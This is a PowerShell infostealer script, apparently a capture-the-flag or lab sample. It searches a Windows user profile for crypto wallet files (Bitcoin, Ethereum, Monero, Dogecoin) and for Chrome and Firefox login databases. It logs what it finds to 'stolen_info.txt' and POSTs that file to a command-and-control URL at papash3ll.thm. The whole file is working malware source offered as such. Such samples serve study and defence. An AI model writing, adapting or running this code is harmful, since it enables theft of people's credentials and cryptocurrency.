function Print-AsciiArt { Write-Host " ____ _ ___ _____ ___ _ _ " Write-Host " / ___| | | |_ _||_ _| / __| | | | |" Write-Host "| | _ | | | | | | | | | |_| |" Write-Host "| |_| | | |___ | | | | | |__ | _ |" Write-Host " \____| |_____| |___| |_| \___| |_| |_|" Write-Host " Created by the one and only M.M." } # Call the function to print the ASCII art Print-AsciiArt # Path for the info file $infoFilePath = "stolen_info.txt" # Function to search for wallet files function Search-ForWallets { $walletPaths = @( "$env:USERPROFILE\.bitcoin\wallet.dat", "$env:USERPROFILE\.ethereum\keystore\*", "$env:USERPROFILE\.monero\wallet", "$env:USERPROFILE\.dogecoin\wallet.dat" ) Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###" foreach ($path in $walletPaths) { if (Test-Path $path) { Add-Content -Path $infoFilePath -Value "Found wallet: $path" } } } # Function to search for browser credential files (SQLite databases) function Search-ForBrowserCredentials { $chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data" $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json" Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###" if (Test-Path $chromePath) { Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath" } if (Test-Path $firefoxPath) { Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath" } } # Function to send the stolen info to a C2 server function Send-InfoToC2Server { $c2Url = "http://papash3ll.thm/data" $data = Get-Content -Path $infoFilePath -Raw # Using Invoke-WebRequest to send data to the C2 server Invoke-WebRequest -Uri $c2Url -Method Post -Body $data } # Main execution flow Search-ForWallets Search-ForBrowserCredentials Send-InfoToC2Server